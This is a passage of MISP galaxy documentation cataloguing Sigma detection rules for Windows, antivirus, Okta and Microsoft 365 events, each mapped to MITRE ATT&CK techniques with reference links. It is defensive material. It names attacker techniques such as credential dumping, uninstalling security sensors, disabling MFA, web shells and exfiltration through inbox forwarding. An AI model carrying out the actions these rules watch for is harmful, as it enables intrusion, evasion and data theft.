Detects changes to the "DisableRestrictedAdmin" registry value in order to disable or enable RestrictedAdmin mode. RestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop. This prevents your credentials from being harvested during the initial connection process if the remote server has been compromised.

The tag is: misp-galaxy:sigma-rules="RestrictedAdminMode Registry Value Tampering - ProcCreation"

RestrictedAdminMode Registry Value Tampering - ProcCreation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 11124. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/a8e3cf63e97b973a25903d3df9fd55da6252e564/atomics/T1112/T1112.md

https://social.technet.microsoft.com/wiki/contents/articles/32905.remote-desktop-services-enable-restricted-admin-mode.aspx

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_lsa_disable_restricted_admin.yml

Service StartupType Change Via PowerShell Set-Service

Detects the use of the PowerShell "Set-Service" cmdlet to change the startup type of a service to "disabled" or "manual"

The tag is: misp-galaxy:sigma-rules="Service StartupType Change Via PowerShell Set-Service"

Service StartupType Change Via PowerShell Set-Service has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 11125. Table References

Links

https://www.virustotal.com/gui/file/38283b775552da8981452941ea74191aa0d203edd3f61fb2dee7b0aea3514955

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_set_service_disabled.yml

Uninstall Crowdstrike Falcon Sensor

Adversaries may disable security tools to avoid possible detection of their tools and activities by uninstalling Crowdstrike Falcon

The tag is: misp-galaxy:sigma-rules="Uninstall Crowdstrike Falcon Sensor"

Uninstall Crowdstrike Falcon Sensor has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 11126. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uninstall_crowdstrike_falcon.yml

Discovery of a System Time

Identifies use of various commands to query a system's time. This technique may be used before executing a scheduled task or to discover the time zone of a target system.

The tag is: misp-galaxy:sigma-rules="Discovery of a System Time"

Discovery of a System Time has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124" with estimative-language:likelihood-probability="almost-certain"

Table 11127. Table References

Links

https://eqllib.readthedocs.io/en/latest/analytics/fcdb99c2-ac3c-4bde-b664-4b336329bed2.html

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1124/T1124.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_time_discovery.yml

Remote Access Tool - RURAT Execution From Unusual Location

Detects execution of Remote Utilities RAT (RURAT) from an unusual location (outside of 'C:\Program Files')

The tag is: misp-galaxy:sigma-rules="Remote Access Tool - RURAT Execution From Unusual Location"

Table 11128. Table References

Links

https://redcanary.com/blog/misbehaving-rats/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_access_tools_rurat_non_default_location.yml

Remote Access Tool - AnyDesk Silent Installation

Detects AnyDesk Remote Desktop silent installation, which can be used by attackers to gain remote access.

The tag is: misp-galaxy:sigma-rules="Remote Access Tool - AnyDesk Silent Installation"

Remote Access Tool - AnyDesk Silent Installation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Remote Access Software - T1219" with estimative-language:likelihood-probability="almost-certain"

Table 11129. Table References

Links

https://support.anydesk.com/Automatic_Deployment

https://twitter.com/TheDFIRReport/status/1423361119926816776?s=20

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_access_tools_anydesk_silent_install.yml

HackTool - PowerTool Execution

Detects the execution of the tool PowerTool which has the ability to kill a process, delete its process file, unload drivers, and delete the driver files

The tag is: misp-galaxy:sigma-rules="HackTool - PowerTool Execution"

HackTool - PowerTool Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 11130. Table References

Links

https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/

https://www.softpedia.com/get/Antivirus/Removal-Tools/ithurricane-PowerTool.shtml

https://twitter.com/gbti_sa/status/1249653895900602375?lang=en

https://www.trendmicro.com/en_us/research/22/i/play-ransomware-s-attack-playbook-unmasks-it-as-another-hive-aff.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_powertool.yml

Suspicious Control Panel DLL Load

Detects suspicious Rundll32 execution from control.exe as used by Equation Group and Exploit Kits

The tag is: misp-galaxy:sigma-rules="Suspicious Control Panel DLL Load"

Suspicious Control Panel DLL Load has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"

Table 11131. Table References

Links

https://twitter.com/rikvduijn/status/853251879320662017

https://twitter.com/felixw3000/status/853354851128025088

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_susp_control_dll_load.yml

Renamed PingCastle Binary Execution

Detects the execution of a renamed "PingCastle" binary based on the PE metadata fields.

The tag is: misp-galaxy:sigma-rules="Renamed PingCastle Binary Execution"

Renamed PingCastle Binary Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Indirect Command Execution - T1202" with estimative-language:likelihood-probability="almost-certain"

Table 11132. Table References

Links

https://www.pingcastle.com/documentation/scanner/

https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_pingcastle.yml

Potential Provlaunch.EXE Binary Proxy Execution Abuse

Detects child processes of "provlaunch.exe" which might indicate potential abuse to proxy execution.

The tag is: misp-galaxy:sigma-rules="Potential Provlaunch.EXE Binary Proxy Execution Abuse"

Potential Provlaunch.EXE Binary Proxy Execution Abuse has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 11133. Table References

Links

https://twitter.com/0gtweet/status/1674399582162153472

https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_provlaunch_potential_abuse.yml

Antivirus Password Dumper Detection

Detects a highly relevant Antivirus alert that reports a password dumper

The tag is: misp-galaxy:sigma-rules="Antivirus Password Dumper Detection"

Antivirus Password Dumper Detection has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Steal or Forge Kerberos Tickets - T1558" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Security Account Manager - T1003.002" with estimative-language:likelihood-probability="almost-certain"

Table 11134. Table References

Links

https://www.virustotal.com/gui/file/a4edfbd42595d5bddb442c82a02cf0aaa10893c1bf79ea08b9ce576f82749448

https://www.nextron-systems.com/?s=antivirus

https://www.virustotal.com/gui/file/5fcda49ee7f202559a6cbbb34edb65c33c9a1e0bde9fa2af06a6f11b55ded619

https://github.com/SigmaHQ/sigma/tree/master/rules/category/antivirus/av_password_dumper.yml

Antivirus Relevant File Paths Alerts

Detects an Antivirus alert in a highly relevant file path or with a relevant file name

The tag is: misp-galaxy:sigma-rules="Antivirus Relevant File Paths Alerts"

Antivirus Relevant File Paths Alerts has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obtain Capabilities - T1588" with estimative-language:likelihood-probability="almost-certain"

Table 11135. Table References

Links

https://www.nextron-systems.com/?s=antivirus

https://github.com/SigmaHQ/sigma/tree/master/rules/category/antivirus/av_relevant_files.yml

Antivirus Exploitation Framework Detection

Detects a highly relevant Antivirus alert that reports an exploitation framework

The tag is: misp-galaxy:sigma-rules="Antivirus Exploitation Framework Detection"

Antivirus Exploitation Framework Detection has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Remote Access Software - T1219" with estimative-language:likelihood-probability="almost-certain"

Table 11136. Table References

Links

https://www.virustotal.com/gui/file/925b0b28472d4d79b4bf92050e38cc2b8f722691c713fc28743ac38551bc3797

https://www.nextron-systems.com/?s=antivirus

https://www.virustotal.com/gui/file/d9669f7e3eb3a9cdf6a750eeb2ba303b5ae148a43e36546896f1d1801e912466

https://www.virustotal.com/gui/file/8f8daabe1c8ceb5710949283818e16c4aa8059bf2ce345e2f2c90b8692978424

https://github.com/SigmaHQ/sigma/tree/master/rules/category/antivirus/av_exploiting.yml

Antivirus Hacktool Detection

Detects a highly relevant Antivirus alert that reports a hack tool or other attack tool

The tag is: misp-galaxy:sigma-rules="Antivirus Hacktool Detection"

Antivirus Hacktool Detection has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="User Execution - T1204" with estimative-language:likelihood-probability="almost-certain"

Table 11137. Table References

Links

https://www.nextron-systems.com/?s=antivirus

https://www.nextron-systems.com/2021/08/16/antivirus-event-analysis-cheat-sheet-v1-8-2/

https://github.com/SigmaHQ/sigma/tree/master/rules/category/antivirus/av_hacktool.yml

Antivirus Web Shell Detection

Detects a highly relevant Antivirus alert that reports a web shell. It's highly recommended to tune this rule to the specific strings used by your antivirus solution by downloading a big webshell repo from e.g. GitHub and checking the matches.

The tag is: misp-galaxy:sigma-rules="Antivirus Web Shell Detection"

Antivirus Web Shell Detection has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Web Shell - T1505.003" with estimative-language:likelihood-probability="almost-certain"

Table 11138. Table References

Links

https://github.com/tennc/webshell

https://www.virustotal.com/gui/file/308487ed28a3d9abc1fec7ebc812d4b5c07ab025037535421f64c60d3887a3e8/detection

https://www.virustotal.com/gui/file/7d3cb8a8ff28f82b07f382789247329ad2d7782a72dde9867941f13266310c80/detection

https://www.virustotal.com/gui/file/a80042c61a0372eaa0c2c1e831adf0d13ef09feaf71d1d20b216156269045801/detection

https://www.virustotal.com/gui/file/13ae8bfbc02254b389ab052aba5e1ba169b16a399d9bc4cb7414c4a73cd7dc78/detection

https://www.virustotal.com/gui/file/e841675a4b82250c75273ebf0861245f80c6a1c3d5803c2d995d9d3b18d5c4b5/detection

https://www.virustotal.com/gui/file/b8702acf32fd651af9f809ed42d15135f842788cd98d81a8e1b154ee2a2b76a2/detection

https://www.virustotal.com/gui/file/b219f7d3c26f8bad7e175934cd5eda4ddb5e3983503e94ff07d39c0666821b7e/detection

https://www.virustotal.com/gui/file/bd1d52289203866645e556e2766a21d2275877fbafa056a76fe0cf884b7f8819/detection

https://www.nextron-systems.com/?s=antivirus

https://github.com/SigmaHQ/sigma/tree/master/rules/category/antivirus/av_webshell.yml

Suspicious SQL Query

Detects suspicious SQL query keywords that are often used during recon, exfiltration or destructive activities, such as dropping tables and selecting wildcard fields.

The tag is: misp-galaxy:sigma-rules="Suspicious SQL Query"

Suspicious SQL Query has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="SQL Stored Procedures - T1505.001" with estimative-language:likelihood-probability="almost-certain"

Table 11140. Table References

Links

https://github.com/sqlmapproject/sqlmap

https://github.com/SigmaHQ/sigma/tree/master/rules/category/database/db_anomalous_query.yml

Okta FastPass Phishing Detection

Detects when Okta FastPass prevents a known phishing site.

The tag is: misp-galaxy:sigma-rules="Okta FastPass Phishing Detection"

Okta FastPass Phishing Detection has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Phishing - T1566" with estimative-language:likelihood-probability="almost-certain"

Table 11141. Table References

Links

https://sec.okta.com/fastpassphishingdetection

https://developer.okta.com/docs/reference/api/event-types/

https://developer.okta.com/docs/reference/api/system-log/

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_fastpass_phishing_detection.yml

Okta New Admin Console Behaviours

Detects when Okta identifies new activity in the Admin Console.

The tag is: misp-galaxy:sigma-rules="Okta New Admin Console Behaviours"

Okta New Admin Console Behaviours has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Cloud Accounts - T1078.004" with estimative-language:likelihood-probability="almost-certain"

Table 11143. Table References

Links

https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection

https://developer.okta.com/docs/reference/api/system-log/

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_new_behaviours_admin_console.yml

Okta Suspicious Activity Reported by End-user

Detects when an Okta end-user reports activity by their account as being potentially suspicious.

The tag is: misp-galaxy:sigma-rules="Okta Suspicious Activity Reported by End-user"

Okta Suspicious Activity Reported by End-user has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Cloud Accounts - T1586.003" with estimative-language:likelihood-probability="almost-certain"

Table 11144. Table References

Links

https://developer.okta.com/docs/reference/api/system-log/

https://github.com/okta/workflows-templates/blob/master/workflows/suspicious_activity_reported/readme.md

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_suspicious_activity_enduser_report.yml

Okta User Account Locked Out

Detects when a user account is locked out.

The tag is: misp-galaxy:sigma-rules="Okta User Account Locked Out"

Okta User Account Locked Out has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Account Access Removal - T1531" with estimative-language:likelihood-probability="almost-certain"

Table 11145. Table References

Links

https://developer.okta.com/docs/reference/api/event-types/

https://developer.okta.com/docs/reference/api/system-log/

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_user_account_locked_out.yml

Okta Identity Provider Created

Detects when a new identity provider is created for Okta.

The tag is: misp-galaxy:sigma-rules="Okta Identity Provider Created"

Okta Identity Provider Created has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Additional Cloud Credentials - T1098.001" with estimative-language:likelihood-probability="almost-certain"

Table 11146. Table References

Links

https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection

https://developer.okta.com/docs/reference/api/system-log/

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_identity_provider_created.yml

Okta Application Sign-On Policy Modified or Deleted

Detects when an application Sign-on Policy is modified or deleted.

The tag is: misp-galaxy:sigma-rules="Okta Application Sign-On Policy Modified or Deleted"

Table 11150. Table References

Links

https://developer.okta.com/docs/reference/api/event-types/

https://developer.okta.com/docs/reference/api/system-log/

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_application_sign_on_policy_modified_or_deleted.yml

Okta Admin Role Assignment Created

Detects when a new admin role assignment is created, which could be a sign of privilege escalation or persistence.

The tag is: misp-galaxy:sigma-rules="Okta Admin Role Assignment Created"

Table 11151. Table References

Links

https://developer.okta.com/docs/reference/api/event-types/

https://developer.okta.com/docs/reference/api/system-log/

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_admin_role_assignment_created.yml

Okta Admin Role Assigned to an User or Group

Detects when the Administrator role is assigned to a user or group.

The tag is: misp-galaxy:sigma-rules="Okta Admin Role Assigned to an User or Group"

Okta Admin Role Assigned to an User or Group has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Additional Cloud Roles - T1098.003" with estimative-language:likelihood-probability="almost-certain"

Table 11152. Table References

Links

https://developer.okta.com/docs/reference/api/event-types/

https://developer.okta.com/docs/reference/api/system-log/

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_admin_role_assigned_to_user_or_group.yml

New Okta User Created

Detects new user account creation

The tag is: misp-galaxy:sigma-rules="New Okta User Created"

Table 11153. Table References

Links

https://developer.okta.com/docs/reference/api/event-types/

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_user_created.yml

Potential Okta Password in AlternateID Field

Detects when a user has potentially entered their password into the username field, which will cause the password to be retained in log files.

The tag is: misp-galaxy:sigma-rules="Potential Okta Password in AlternateID Field"

Potential Okta Password in AlternateID Field has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Unsecured Credentials - T1552" with estimative-language:likelihood-probability="almost-certain"

Table 11155. Table References

Links

https://www.mitiga.io/blog/how-okta-passwords-can-be-compromised-uncovering-a-risk-to-user-data

https://help.okta.com/en-us/Content/Topics/users-groups-profiles/usgp-create-character-restriction.htm

https://developer.okta.com/docs/reference/api/system-log/

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_password_in_alternateid_field.yml

Okta Network Zone Deactivated or Deleted

Detects when a Network Zone is deactivated or deleted.

The tag is: misp-galaxy:sigma-rules="Okta Network Zone Deactivated or Deleted"

Table 11157. Table References

Links

https://developer.okta.com/docs/reference/api/event-types/

https://developer.okta.com/docs/reference/api/system-log/

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_network_zone_deactivated_or_deleted.yml

Okta MFA Reset or Deactivated

Detects an attempt at deactivating or resetting MFA.

The tag is: misp-galaxy:sigma-rules="Okta MFA Reset or Deactivated"

Okta MFA Reset or Deactivated has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Multi-Factor Authentication - T1556.006" with estimative-language:likelihood-probability="almost-certain"

Table 11159. Table References

Links

https://developer.okta.com/docs/reference/api/event-types/

https://developer.okta.com/docs/reference/api/system-log/

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_mfa_reset_or_deactivated.yml

Okta Policy Modified or Deleted

Detects when an Okta policy is modified or deleted.

The tag is: misp-galaxy:sigma-rules="Okta Policy Modified or Deleted"

Table 11160. Table References

Links

https://developer.okta.com/docs/reference/api/event-types/

https://developer.okta.com/docs/reference/api/system-log/

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_policy_modified_or_deleted.yml

Okta User Session Start Via An Anonymising Proxy Service

Detects when an Okta user session starts where the user is behind an anonymising proxy service.

The tag is: misp-galaxy:sigma-rules="Okta User Session Start Via An Anonymising Proxy Service"

Okta User Session Start Via An Anonymising Proxy Service has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Indicator Blocking - T1562.006" with estimative-language:likelihood-probability="almost-certain"

Table 11161. Table References

Links

https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection

https://developer.okta.com/docs/reference/api/system-log/

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_user_session_start_via_anonymised_proxy.yml

Disabling Multi Factor Authentication

Detects disabling of Multi Factor Authentication.

The tag is: misp-galaxy:sigma-rules="Disabling Multi Factor Authentication"

Disabling Multi Factor Authentication has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Authentication Process - T1556" with estimative-language:likelihood-probability="almost-certain"

Table 11162. Table References

Links

https://research.splunk.com/cloud/c783dd98-c703-4252-9e8a-f19d9f5c949e/

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/audit/microsoft365_disabling_mfa.yml

New Federated Domain Added

Detects the addition of a new Federated Domain.

The tag is: misp-galaxy:sigma-rules="New Federated Domain Added"

New Federated Domain Added has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Cloud Account - T1136.003" with estimative-language:likelihood-probability="almost-certain"

Table 11163. Table References

Links

https://o365blog.com/post/aadbackdoor/

https://research.splunk.com/cloud/e155876a-6048-11eb-ae93-0242ac130002/

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/audit/microsoft365_new_federated_domain_added_audit.yml

New Federated Domain Added - Exchange

Detects the addition of a new Federated Domain.

The tag is: misp-galaxy:sigma-rules="New Federated Domain Added - Exchange"

New Federated Domain Added - Exchange has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Cloud Account - T1136.003" with estimative-language:likelihood-probability="almost-certain"

Table 11164. Table References

Links

https://us-cert.cisa.gov/ncas/alerts/aa21-008a

https://o365blog.com/post/aadbackdoor/

https://www.splunk.com/en_us/blog/security/a-golden-saml-journey-solarwinds-continued.html

https://www.sygnia.co/golden-saml-advisory

https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/wp-m-unc2452-2021-000343-01.pdf

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/exchange/microsoft365_new_federated_domain_added_exchange.yml

Activity from Anonymous IP Addresses

Detects when Microsoft Cloud App Security reports that users were active from an IP address identified as an anonymous proxy.

The tag is: misp-galaxy:sigma-rules="Activity from Anonymous IP Addresses"

Activity from Anonymous IP Addresses has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Encrypted Channel - T1573" with estimative-language:likelihood-probability="almost-certain"

Table 11165. Table References

Links

https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy

https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/threat_management/microsoft365_activity_from_anonymous_ip_addresses.yml

Data Exfiltration to Unsanctioned Apps

Detects when Microsoft Cloud App Security reports that a user or IP address used an unsanctioned app to perform an activity resembling an attempt to exfiltrate information from your organization.

The tag is: misp-galaxy:sigma-rules="Data Exfiltration to Unsanctioned Apps"

Data Exfiltration to Unsanctioned Apps has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Transfer Data to Cloud Account - T1537" with estimative-language:likelihood-probability="almost-certain"

Table 11166. Table References

Links

https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy

https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/threat_management/microsoft365_data_exfiltration_to_unsanctioned_app.yml

Suspicious Inbox Forwarding

Detects when Microsoft Cloud App Security reports suspicious email forwarding rules, for example a user creating an inbox rule that forwards a copy of all emails to an external address.

The tag is: misp-galaxy:sigma-rules="Suspicious Inbox Forwarding"

Suspicious Inbox Forwarding has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Automated Exfiltration - T1020" with estimative-language:likelihood-probability="almost-certain"

Table 11167. Table References

Links

https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy

https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/threat_management/microsoft365_susp_inbox_forwarding.yml

Activity Performed by Terminated User

Detects when Microsoft Cloud App Security reports users whose accounts were terminated in Azure AD but who still perform activities on other platforms such as AWS or Salesforce. This is especially relevant for users who use another account to manage resources, since these accounts are often not terminated when a user leaves the company.

The tag is: misp-galaxy:sigma-rules="Activity Performed by Terminated User"

Table 11168. Table References

Links

https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy

https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/threat_management/microsoft365_activity_by_terminated_user.yml

Logon from a Risky IP Address

Detects when Microsoft Cloud App Security reports that a user signed into your sanctioned apps from a risky IP address.

The tag is: misp-galaxy:sigma-rules="Logon from a Risky IP Address"

Logon from a Risky IP Address has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

Table 11169. Table References

Links

https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy

https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/threat_management/microsoft365_logon_from_risky_ip_address.yml

PST Export Alert Using New-ComplianceSearchAction

Alerts when a user has performed an export of a search using 'New-ComplianceSearchAction' with the '-Export' flag. This detection will detect a PST export even if the 'eDiscovery search or exported' alert is disabled in O365. This rule applies to ExchangePowerShell usage and to usage from the cloud.

The tag is: misp-galaxy:sigma-rules="PST Export Alert Using New-ComplianceSearchAction"

PST Export Alert Using New-ComplianceSearchAction has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Email Collection - T1114" with estimative-language:likelihood-probability="almost-certain"

Table 11170. Table References

Links

https://learn.microsoft.com/en-us/powershell/module/exchange/new-compliancesearchaction?view=exchange-ps

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/threat_management/microsoft365_pst_export_alert_using_new_compliancesearchaction.yml

Microsoft 365 - Unusual Volume of File Deletion

Detects when Microsoft Cloud App Security reports that a user has deleted an unusually large volume of files.

The tag is: misp-galaxy:sigma-rules="Microsoft 365 - Unusual Volume of File Deletion"

Microsoft 365 - Unusual Volume of File Deletion has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Data Destruction - T1485" with estimative-language:likelihood-probability="almost-certain"

Table 11171. Table References

Links

https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy

https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/threat_management/microsoft365_unusual_volume_of_file_deletion.yml

Microsoft 365 - User Restricted from Sending Email

Detects when the Security Compliance Center reports a user who exceeded the sending limits of the service policies and has consequently been restricted from sending email.

The tag is: misp-galaxy:sigma-rules="Microsoft 365 - User Restricted from Sending Email"

Microsoft 365 - User Restricted from Sending Email has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Trusted Relationship - T1199" with estimative-language:likelihood-probability="almost-certain"

Table 11172. Table References

Links

https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy

https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/threat_management/microsoft365_user_restricted_from_sending_email.yml

Suspicious OAuth App File Download Activities

Detects when Microsoft Cloud App Security reports that an app downloaded multiple files from Microsoft SharePoint or Microsoft OneDrive in a manner that is unusual for the user.

The tag is: misp-galaxy:sigma-rules="Suspicious OAuth App File Download Activities"

Table 11173. Table References

Links

https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy

https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/threat_management/microsoft365_susp_oauth_app_file_download_activities.yml

Microsoft 365 - Impossible Travel Activity

Detects when Microsoft Cloud App Security reports a risky sign-in attempt due to a login associated with impossible travel.

The tag is: misp-galaxy:sigma-rules="Microsoft 365 - Impossible Travel Activity"

Microsoft 365 - Impossible Travel Activity has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

Table 11174. Table References

Links

https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy

https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/threat_management/microsoft365_impossible_travel_activity.yml

Microsoft 365 - Potential Ransomware Activity

Detects when Microsoft Cloud App Security reports that a user uploaded files to the cloud that might be infected with ransomware.

The tag is: misp-galaxy:sigma-rules="Microsoft 365 - Potential Ransomware Activity"

Microsoft 365 - Potential Ransomware Activity has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Data Encrypted for Impact - T1486" with estimative-language:likelihood-probability="almost-certain"

Table 11175. Table References

Links

https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy

https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/threat_management/microsoft365_potential_ransomware_activity.yml

PST Export Alert Using eDiscovery Alert

Alerts when a user has performed an eDiscovery search or exported a PST file from the search. This PST file usually contains sensitive information, including email body content.

The tag is: misp-galaxy:sigma-rules="PST Export Alert Using eDiscovery Alert"

PST Export Alert Using eDiscovery Alert has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Email Collection - T1114" with estimative-language:likelihood-probability="almost-certain"

Table 11176. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/compliance/alert-policies?view=o365-worldwide

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/threat_management/microsoft365_pst_export_alert.yml

Activity from Infrequent Country

Detects when Microsoft Cloud App Security reports an activity from a location that was not recently visited, or was never visited, by any user in the organization.

The tag is: misp-galaxy:sigma-rules="Activity from Infrequent Country"

Activity from Infrequent Country has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Encrypted Channel - T1573" with estimative-language:likelihood-probability="almost-certain"

Table 11177. Table References

Links

https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy

https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/threat_management/microsoft365_activity_from_infrequent_country.yml

Activity from Suspicious IP Addresses

Detects when Microsoft Cloud App Security reports that users were active from an IP address identified as risky by Microsoft Threat Intelligence. These IP addresses are involved in malicious activities, such as botnet C&C, and may indicate a compromised account.

The tag is: misp-galaxy:sigma-rules="Activity from Suspicious IP Addresses"

Activity from Suspicious IP Addresses has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Encrypted Channel - T1573" with estimative-language:likelihood-probability="almost-certain"

Table 11178. Table References

Links

https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy

https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference

